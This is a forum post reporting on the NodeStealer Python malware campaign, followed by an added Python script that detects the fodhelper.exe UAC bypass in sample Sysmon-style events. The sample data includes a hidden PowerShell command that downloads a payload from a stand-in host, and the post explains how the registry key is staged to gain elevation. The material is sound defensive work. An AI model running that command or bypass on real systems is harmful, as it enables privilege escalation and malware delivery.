Official forum for Utopia Community

#1 2023-08-02 23:56:36

Targeting Bitcoin Wallets and Facebook Business Accounts: New NodeStea

The stealer malware NodeStealer has a Python variant that can completely take over Facebook business accounts and siphon cryptocurrency, according to cybersecurity researchers.

As part of a campaign that started in December 2022, Palo Alto Networks Unit 42 claimed to have discovered the previously unidentified strain.

NodeStealer was first identified in May 2023 by Meta, which described it as a stealer that could compromise Facebook, Gmail, and Outlook accounts by gathering cookies and passwords from web browsers. The most recent samples were created in Python, as opposed to the earlier ones, which were created in JavaScript.

According to Unit 42 researcher Lior Rochberger, "NodeStealer poses great risk for both individuals and organizations. In addition to having a direct financial impact on Facebook business accounts, the malware also steals browser login information that can be used in future attacks."

The attacks begin with fake Facebook messages that allegedly offer free "professional" budget tracking Microsoft Excel and Google Sheets templates, tricking victims into downloading a ZIP archive file hosted on Google Drive.

The stealer executable is embedded in the ZIP file and is intended to download additional malware like BitRAT and XWorm as ZIP files, disable Microsoft Defender Antivirus, and steal cryptocurrency using MetaMask credentials from the Google Chrome, Cốc Cốc, and Brave web browsers, in addition to capturing Facebook business account information.

The downloads are carried out using a User Account Control (UAC) bypass method that makes use of fodhelper.exe to run PowerShell scripts that download ZIP files from a distant server.

It's important to note that the threat actors behind the Casbaneiro banking malware have also used the FodHelper UAC bypass technique to gain elevated privileges on infected hosts.

The upgraded Python version of NodeStealer, according to Unit 42, goes beyond credential and cryptocurrency theft by implementing anti-analysis features, parsing emails from Microsoft Outlook, and even attempting to hijack the associated Facebook account.

The files are exfiltrated through the Telegram API after the necessary data has been gathered, and then they are removed from the computer to remove the trail.

NodeStealer is another piece of malware that joins the likes of Ducktail in the growing trend of Vietnamese threat actors trying to hack Facebook business accounts in order to commit advertising fraud and spread malware to other users of the social media platform.


As part of a multi-stage phishing attack, threat actors have been seen using WebDAV servers to deploy BATLOADER, which is then used to disseminate XWorm.

Rochberger advised Facebook business account owners to enable multi-factor authentication and use strong passwords. "Spend the time to educate your company on phishing techniques, particularly modern, targeted strategies that capitalize on business requirements, current events, and other alluring topics."
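The post mentions the fodhelper.exe UAC bypass without saying what it looks like on an endpoint. The technique works because fodhelper.exe is auto-elevated and resolves the ms-settings: protocol handler from the current user's hive, so a value written under HKCU\Software\Classes\ms-settings\shell\open\command runs at high integrity when fodhelper.exe starts. The detection logic below is an added example, not code from the post, from Unit 42 or from the malware: it scans constructed, Sysmon-style event records (a simplified key=value flattening assumed for the example, not Sysmon's real schema) for the registry staging and for fodhelper.exe spawning a shell child. The function name detect_fodhelper_bypass, the sample file paths and the example.invalid URL are all assumptions.

```python
"""Detect the fodhelper.exe UAC bypass chain in Sysmon-style event records.

Added example, not the post's or Unit 42's code. Record format is a constructed
'key=value|key=value' flattening of Sysmon fields (EventID 13 = registry value
set, EventID 1 = process creation); real Sysmon emits XML, and the field names
used here (TargetObject, Details, Image, ParentImage, IntegrityLevel,
CommandLine) are the ones Sysmon uses.
"""
import re

# fodhelper.exe reads this handler from HKCU (logged by Sysmon as HKU\<SID>\...).
MS_SETTINGS_CMD = re.compile(
    r"\\classes\\ms-settings\\shell\\open\\command", re.IGNORECASE
)
# Children that fodhelper.exe has no legitimate reason to spawn.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "rundll32.exe",
}


def parse_record(line):
    """Turn one 'k=v|k=v' line (constructed format) into a dict."""
    rec = {}
    for part in line.split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            rec[key.strip()] = value.strip()
    return rec


def basename(path):
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_fodhelper_bypass(lines):
    """Return alert strings for the records in `lines`.

    Staging the ms-settings handler alone is MEDIUM; fodhelper.exe spawning a
    shell child is MEDIUM on its own and HIGH once staging was seen earlier in
    the same stream (the full chain).
    """
    alerts = []
    staged = False
    for line in lines:
        rec = parse_record(line)
        event_id = rec.get("EventID")
        if event_id == "13" and MS_SETTINGS_CMD.search(rec.get("TargetObject", "")):
            staged = True
            alerts.append(
                f"MEDIUM: {basename(rec.get('Image', ''))} wrote ms-settings "
                f"handler {basename(rec.get('TargetObject', ''))}: {rec.get('Details', '')}"
            )
        elif event_id == "1":
            parent = basename(rec.get("ParentImage", ""))
            child = basename(rec.get("Image", ""))
            if parent == "fodhelper.exe" and child in SUSPICIOUS_CHILDREN:
                severity = "HIGH" if staged else "MEDIUM"
                alerts.append(
                    f"{severity}: fodhelper.exe spawned {child} "
                    f"(IntegrityLevel={rec.get('IntegrityLevel', '?')}): "
                    f"{rec.get('CommandLine', '')}"
                )
    return alerts


# Constructed sample stream modelled on the post's description: a lure binary
# stages the handler, launches fodhelper.exe, which runs PowerShell elevated.
SAMPLE_EVENTS = [
    "EventID=1|Image=C:\\Users\\victim\\Downloads\\BudgetTemplate.exe"
    "|ParentImage=C:\\Windows\\explorer.exe|IntegrityLevel=Medium|CommandLine=BudgetTemplate.exe",
    "EventID=13|Image=C:\\Users\\victim\\Downloads\\BudgetTemplate.exe"
    "|TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute"
    "|Details=",
    "EventID=13|Image=C:\\Users\\victim\\Downloads\\BudgetTemplate.exe"
    "|TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Classes\\ms-settings\\shell\\open\\command\\(Default)"
    "|Details=powershell.exe -w hidden -ep bypass -c iwr https://example.invalid/a.zip -OutFile a.zip",
    "EventID=1|Image=C:\\Windows\\System32\\fodhelper.exe"
    "|ParentImage=C:\\Users\\victim\\Downloads\\BudgetTemplate.exe|IntegrityLevel=High|CommandLine=fodhelper.exe",
    "EventID=1|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\fodhelper.exe|IntegrityLevel=High"
    "|CommandLine=powershell.exe -w hidden -ep bypass -c iwr https://example.invalid/a.zip -OutFile a.zip",
    "EventID=1|Image=C:\\Windows\\System32\\notepad.exe"
    "|ParentImage=C:\\Windows\\explorer.exe|IntegrityLevel=Medium|CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for alert in detect_fodhelper_bypass(SAMPLE_EVENTS):
        print(alert)
```

The registry write is the earlier and more reliable signal: it happens before any elevated process exists, and legitimate software has no reason to create a user-hive ms-settings handler. The process-tree check catches variants that stage the key by other means, and correlating the two in one stream is what lifts the alert to HIGH.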

